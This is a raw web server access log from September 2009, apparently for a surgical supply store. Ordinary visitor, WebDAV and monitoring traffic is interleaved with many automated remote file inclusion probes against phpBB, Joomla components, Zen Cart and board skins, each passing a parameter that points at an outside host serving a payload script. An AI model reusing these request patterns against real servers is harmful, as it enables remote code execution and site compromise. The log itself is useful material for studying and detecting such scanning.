89.187.131.186 - - [23/Sep/2009:07:38:02 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://zi0n.interfree.it/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.187.131.186 - - [23/Sep/2009:07:38:02 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://zi0n.interfree.it/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
172.16.1.87 - - [23/Sep/2009:07:38:10 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [23/Sep/2009:07:38:10 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [23/Sep/2009:07:38:10 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
64.221.88.162 - - [23/Sep/2009:07:38:17 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
64.221.88.162 - - [23/Sep/2009:07:38:17 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
64.221.88.162 - - [23/Sep/2009:07:38:18 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
64.221.88.162 - - [23/Sep/2009:07:38:18 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
89.187.131.186 - - [23/Sep/2009:07:38:19 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://zi0n.interfree.it/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.187.131.186 - - [23/Sep/2009:07:38:19 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://zi0n.interfree.it/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.59.12.99 - - [23/Sep/2009:07:38:19 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.187.131.186 - - [23/Sep/2009:07:38:24 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://zi0n.interfree.it/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.187.131.186 - - [23/Sep/2009:07:39:00 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://zi0n.interfree.it/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
172.16.1.87 - - [23/Sep/2009:07:39:16 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [23/Sep/2009:07:39:16 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [23/Sep/2009:07:39:16 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.159 - - [23/Sep/2009:07:39:46 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.159 - - [23/Sep/2009:07:39:46 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.159 - - [23/Sep/2009:07:39:46 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
89.187.131.186 - - [23/Sep/2009:07:39:54 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://zi0n.interfree.it/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.187.131.186 - - [23/Sep/2009:07:39:54 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://zi0n.interfree.it/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.187.131.186 - - [23/Sep/2009:07:39:54 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://zi0n.interfree.it/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
204.152.199.34 - - [23/Sep/2009:07:40:31 -0400] "GET /logs/access_log.Q109063000%20%20//skin/zero_vote/ask_password.php?dir=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
172.16.1.87 - - [23/Sep/2009:07:40:43 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [23/Sep/2009:07:40:43 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [23/Sep/2009:07:40:43 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
222.122.72.216 - - [23/Sep/2009:07:40:44 -0400] "GET //include/mail.inc.php?skin_board_path=http://web-montagne.com/id1.php? HTTP/1.1" 404 219 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
222.122.72.216 - - [23/Sep/2009:07:40:44 -0400] "GET /logs/access_log.Q109090400//include/mail.inc.php?skin_board_path=http://web-montagne.com/id1.php? HTTP/1.1" 404 246 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
222.122.72.216 - - [23/Sep/2009:07:40:44 -0400] "GET /logs/error_log.Q109090400//include/mail.inc.php?skin_board_path=http://web-montagne.com/id1.php? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
222.122.72.216 - - [23/Sep/2009:07:40:44 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://web-montagne.com/id1.php? HTTP/1.1" 404 224 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
222.122.72.216 - - [23/Sep/2009:07:40:47 -0400] "GET /logs/access_log.Q109090400//include/mail.inc.php?skin_board_path=http://web-montagne.com/id1.php? HTTP/1.1" 404 246 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
222.122.72.216 - - [23/Sep/2009:07:40:47 -0400] "GET //include/mail.inc.php?skin_board_path=http://web-montagne.com/id1.php? HTTP/1.1" 404 219 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
222.122.72.216 - - [23/Sep/2009:07:40:47 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://web-montagne.com/id1.php? HTTP/1.1" 404 224 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
222.122.72.216 - - [23/Sep/2009:07:40:48 -0400] "GET /logs/error_log.Q109090400//include/mail.inc.php?skin_board_path=http://web-montagne.com/id1.php? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
222.122.72.216 - - [23/Sep/2009:07:41:18 -0400] "GET /logs/access_log.Q109090400//include/mail.inc.php?skin_board_path=http://web-montagne.com/id1.php? HTTP/1.1" 404 246 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
222.122.72.216 - - [23/Sep/2009:07:41:18 -0400] "GET //include/mail.inc.php?skin_board_path=http://web-montagne.com/id1.php? HTTP/1.1" 404 219 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
222.122.72.216 - - [23/Sep/2009:07:41:18 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://web-montagne.com/id1.php? HTTP/1.1" 404 224 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
204.152.199.34 - - [23/Sep/2009:07:41:18 -0400] "GET /logs/error_log.Q109063000%20%20//skin/zero_vote/ask_password.php?dir=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
222.122.72.216 - - [23/Sep/2009:07:41:19 -0400] "GET /logs/error_log.Q109090400//include/mail.inc.php?skin_board_path=http://web-montagne.com/id1.php? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
172.16.1.87 - - [23/Sep/2009:07:42:25 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [23/Sep/2009:07:42:25 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [23/Sep/2009:07:42:25 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
209.59.12.99 - - [23/Sep/2009:07:43:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
172.16.1.176 - - [23/Sep/2009:07:43:42 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.176 - - [23/Sep/2009:07:43:42 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.176 - - [23/Sep/2009:07:43:42 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
121.78.116.209 - - [23/Sep/2009:07:43:42 -0400] "GET /logs/[Script%20Path]/admin/index.php?o=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
121.78.116.209 - - [23/Sep/2009:07:43:42 -0400] "GET /[Script%20Path]/admin/index.php?o=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.78.116.209 - - [23/Sep/2009:07:43:42 -0400] "GET /logs/access_log.Q109051800/[Script%20Path]/admin/index.php?o=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
211.115.111.122 - - [23/Sep/2009:07:44:32 -0400] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/id1v4.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
211.115.111.122 - - [23/Sep/2009:07:44:33 -0400] "GET /logs///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/id1v4.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
211.115.111.122 - - [23/Sep/2009:07:44:36 -0400] "GET /logs///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/id1v4.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
211.115.111.122 - - [23/Sep/2009:07:44:36 -0400] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/id1v4.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
211.39.130.24 - - [23/Sep/2009:07:44:46 -0400] "GET /logs/access_log.Q109052200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
172.16.1.176 - - [23/Sep/2009:07:44:47 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.176 - - [23/Sep/2009:07:44:47 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.176 - - [23/Sep/2009:07:44:47 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [23/Sep/2009:07:44:58 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [23/Sep/2009:07:44:58 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [23/Sep/2009:07:44:58 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
211.115.111.122 - - [23/Sep/2009:07:45:32 -0400] "GET /logs/access_log.Q109072500%20%20///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/id1v4.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.115.111.122 - - [23/Sep/2009:07:45:32 -0400] "GET /logs/access_log.Q109072500%20%20///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/id1v4.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
110.45.144.59 - - [23/Sep/2009:07:46:09 -0400] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.grate.ru/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
110.45.144.59 - - [23/Sep/2009:07:46:09 -0400] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.grate.ru/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
110.45.144.59 - - [23/Sep/2009:07:46:09 -0400] "GET /logs/access_log.Q109053100%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.grate.ru/id1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
211.115.111.122 - - [23/Sep/2009:07:46:11 -0400] "GET /logs/access_log.Q109081400%20%20///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/id1v4.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.115.111.122 - - [23/Sep/2009:07:46:11 -0400] "GET /logs/access_log.Q109081400%20%20///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/id1v4.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
210.115.58.73 - - [23/Sep/2009:07:46:50 -0400] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/idoisir.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
210.115.58.73 - - [23/Sep/2009:07:46:50 -0400] "GET /logs///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/idoisir.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
210.115.58.73 - - [23/Sep/2009:07:46:50 -0400] "GET /logs/access_log.Q109072500///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/idoisir.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.79"
210.115.58.73 - - [23/Sep/2009:07:46:54 -0400] "GET /logs/access_log.Q109072500///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/idoisir.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.79"
210.115.58.73 - - [23/Sep/2009:07:46:54 -0400] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/idoisir.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
210.115.58.73 - - [23/Sep/2009:07:46:54 -0400] "GET /logs///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/idoisir.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
64.221.88.162 - - [23/Sep/2009:07:46:56 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
64.221.88.162 - - [23/Sep/2009:07:46:56 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
64.221.88.162 - - [23/Sep/2009:07:46:57 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
64.221.88.162 - - [23/Sep/2009:07:46:57 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
210.115.58.73 - - [23/Sep/2009:07:47:09 -0400] "GET /logs/access_log.Q109091600///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/idoisir.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.79"
210.115.58.73 - - [23/Sep/2009:07:47:11 -0400] "GET /logs/access_log.Q109091600///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/idoisir.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.79"
211.115.111.122 - - [23/Sep/2009:07:47:31 -0400] "GET /logs/access_log.Q109091600%20%20///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/id1v4.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
121.78.116.209 - - [23/Sep/2009:07:47:32 -0400] "GET /logs/access_log.Q109051800/[Script%20Path]/admin/index.php?o=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
121.78.116.209 - - [23/Sep/2009:07:47:32 -0400] "GET /logs/[Script%20Path]/admin/index.php?o=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
121.78.116.209 - - [23/Sep/2009:07:47:32 -0400] "GET /[Script%20Path]/admin/index.php?o=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.115.111.122 - - [23/Sep/2009:07:47:35 -0400] "GET /logs/access_log.Q109091600%20%20///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/id1v4.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.115.111.122 - - [23/Sep/2009:07:47:36 -0400] "GET /logs/access_log.Q109072000%20%20///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/id1v4.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.115.111.122 - - [23/Sep/2009:07:47:36 -0400] "GET /logs/access_log.Q109072000%20%20///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/id1v4.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.115.111.122 - - [23/Sep/2009:07:47:38 -0400] "GET /logs/access_log.Q109072200%20%20///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/id1v4.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.115.111.122 - - [23/Sep/2009:07:47:40 -0400] "GET /logs/access_log.Q109072200%20%20///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/id1v4.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
110.45.144.59 - - [23/Sep/2009:07:47:53 -0400] "GET /logs/access_log.Q109053100//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.grate.ru/id1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
209.59.12.99 - - [23/Sep/2009:07:48:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
172.16.1.96 - - [23/Sep/2009:07:49:35 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.96 - - [23/Sep/2009:07:49:35 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.96 - - [23/Sep/2009:07:49:35 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
89.187.131.186 - - [23/Sep/2009:07:49:59 -0400] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://zi0n.interfree.it/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
89.187.131.186 - - [23/Sep/2009:07:49:59 -0400] "GET /logs/access_log.Q109061400%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://zi0n.interfree.it/id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
89.187.131.186 - - [23/Sep/2009:07:49:59 -0400] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://zi0n.interfree.it/id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
210.115.58.73 - - [23/Sep/2009:07:50:45 -0400] "GET /logs/access_log.Q109072500%20///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/idoisir.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.79"
172.16.1.96 - - [23/Sep/2009:07:50:46 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.96 - - [23/Sep/2009:07:50:46 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.96 - - [23/Sep/2009:07:50:46 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
210.115.58.73 - - [23/Sep/2009:07:50:59 -0400] "GET /logs/access_log.Q109072500%20///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/idoisir.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.79"
72.30.142.250 - - [23/Sep/2009:07:50:46 -0400] "GET /logs/access_log.Q109051900 HTTP/1.0" 200 5938231 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
172.16.1.180 - - [23/Sep/2009:07:51:23 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Sep/2009:07:51:23 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Sep/2009:07:51:23 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
203.234.62.129 - - [23/Sep/2009:07:51:53 -0400] "GET /logs/access_log.Q109081200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.234.62.129 - - [23/Sep/2009:07:51:53 -0400] "GET /logs/access_log.Q109051500//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
71.166.106.13 - - [23/Sep/2009:07:52:16 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.166.106.13 - - [23/Sep/2009:07:52:16 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.166.106.13 - - [23/Sep/2009:07:52:16 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.166.106.13 - - [23/Sep/2009:07:52:16 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
67.205.103.171 - - [23/Sep/2009:07:52:39 -0400] "GET //?include_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
67.205.103.171 - - [23/Sep/2009:07:52:39 -0400] "GET /logs/access_log.Q109051300//?include_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
67.205.103.171 - - [23/Sep/2009:07:52:39 -0400] "GET /logs//?include_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 200 18977 "-" "Mozilla/5.0"
67.205.103.171 - - [23/Sep/2009:07:52:41 -0400] "GET /logs/access_log.Q109051100//?include_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
71.166.106.13 - - [23/Sep/2009:07:52:41 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):02+RNSUBS%20(S0040):0 HTTP/1.1" 200 63436 "http://www.acesurgical.com/osteocel.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.166.106.13 - - [23/Sep/2009:07:52:49 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):02+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.166.106.13 - - [23/Sep/2009:07:52:49 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):02+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.166.106.13 - - [23/Sep/2009:07:52:49 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):02+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
